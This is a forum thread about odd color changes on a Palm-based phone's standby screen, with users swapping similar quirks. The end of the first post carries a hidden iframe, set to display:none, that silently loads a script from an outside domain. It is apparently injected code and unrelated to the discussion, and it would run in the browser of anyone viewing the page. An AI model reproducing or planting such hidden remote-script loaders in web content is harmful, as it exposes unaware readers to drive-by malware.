+ Reply to Thread

Whoa... What's With This One? (phone status screen)

ok, just looked down at my phone screen and the selector (highlighted bar to select address book, phone #, etc.. on the phone standby screen) was ORANGE ...

I reset the phone and now it's back to blue...

Anybody else? This phone acts pretty phunky...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I haven't seen that one, but on mine if you have an application open, like a game and switch to phone mode, the antenna indicator will be purple instead of blue. Switching back to the palm side which shuts down the app. and switching back again to phone mode causes the signal strength meter to be blue again. Just another curious little quirck. I imagine you'll see it again or something else crazy. I think we all have to get used to it!

Originally posted by sndtubes
    I haven't seen that one, but on mine if you have an application open, like a game and switch to phone mode, the antenna indicator will be purple instead of blue. Switching back to the palm side which shuts down the app. and switching back again to phone mode causes the signal strength meter to be blue again. Just another curious little quirck. I imagine you'll see it again or something else crazy. I think we all have to get used to it!
    Hey... it's a 65,000 color display, and they didn't want to waste any of them
    Please visit my picture site: Robert-O-Rama :)

My icons turn blue every once in a while. :upsidedow

I had a call once when I was using AcidImage, and the font and icons on the phone screen were the same pale green as the green in AcidImage. After closing AcidImage, it all went back to black (with blue for signal strength).